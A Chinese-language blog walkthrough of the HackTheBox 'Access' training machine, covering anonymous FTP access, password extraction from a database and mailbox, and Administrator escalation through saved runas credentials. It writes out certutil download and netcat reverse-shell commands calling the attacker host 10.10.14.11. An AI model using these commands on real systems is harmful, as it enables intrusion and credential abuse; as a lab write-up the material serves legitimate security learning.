No.77-HackTheBox-windows-Access-Walkthrough渗透学习

**

HackTheBox-windows-Access-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines/profile/156
靶机难度:初级(4.0/10)
靶机发布日期:2019年2月25日
靶机描述:
Access is an “easy” difficulty machine, that highlights how machines associated with the physical security of an environment may not themselves be secure. Also highlighted is how accessible FTP/file shares often lead to getting a foothold or lateral movement. It teaches techniques for identifying and exploiting saved credentials.

作者:大余
时间:2020-03-25
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
可以看到靶机的IP是10.10.10.98…

Nmap发现可以匿名登录FTP,Telnet和运行IIS 7.5的Web服务器运行着,IIS 7.5知道是 Windows Server 2008 R2版本…
在这里插入图片描述
80页面可以看到视频监控的图片…没获得什么信息…
在这里插入图片描述
直接来到FTP匿名登录了…发现两个文件,下载分析…
backup.mdb是数据库文件…找下底层有没有账号密码…
apt-get install mdbtools 这里需要下载mdb工具对数据库进行查看…
在这里插入图片描述
由于最近HTB老是出问题,我这里就最简洁的方式查看到了密码…
在这里插入图片描述
输入密码即可…7z e Access\ Control.zip -paccess4u@security
在这里插入图片描述
这是Microsoft Outlook电子邮件文件夹…
在这里插入图片描述
命令:apt-get install pst-utils
命令:readpst 'Access Control.pst'
意思是创建了Access Control.mbox文件来读取内容…
在这里插入图片描述
首先看到的是这封电子邮件,其中包含名为的帐户的凭据security,密码:4CcessC0ntr0ller…
在这里插入图片描述
登陆23端口…成功获得了user信息…
在这里插入图片描述
由于现在处于security用户下,无法进入管理员权限…在用户界面还存在Public用户,进去在桌面发现了lnk文件…
读取发现Windows\System32\runas.exe以管理员身份运行着…
在这里插入图片描述
Password required设置为No,如果设置为Yes,将无法在runas不知道密码的情况下作为管理员进行使用…
这里的runas是允许我们以其他用户身份运行命令,并且该选项/savecred允许我们使用该命令无需输入密码…
在这里插入图片描述
这里直接上传nc.exe,利用runas /user:Administrator /savecred无密码登陆模式执行反向shell即可…
在这里插入图片描述
命令:

certutil -urlcache -split -f http://10.10.14.11/nc.exe nc.exe
echo c:\users\security\nc.exe -e cmd.exe 10.10.14.11 6666 > shell.bat
runas /user:administrator /savecred c:\users\security\shell.bat

成功提权…获得了root信息…
方法2:
查看Windows - Privilege Escalation文章可以进行windows的命令查询…
在这里插入图片描述
可以看到windows方式提权很多,前辈已经介绍了这类的方法…开始把
在这里插入图片描述
使用cmdkey列出机器上存储的凭证…并且存在一个凭证…
在这里插入图片描述
命令:runas /user:Access\Administrator /savecred "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt > C:\Users\security\Desktop\dayu.txt"
可以看到成功获得root信息…

由于我们已经成功得到root权限查看user.txt和root.txt,因此完成了靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

发布了82 篇原创文章 · 获赞 9 · 访问量 2万+
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 大白 设计师: CSDN官方博客

分享到微信朋友圈

×

扫一扫,手机浏览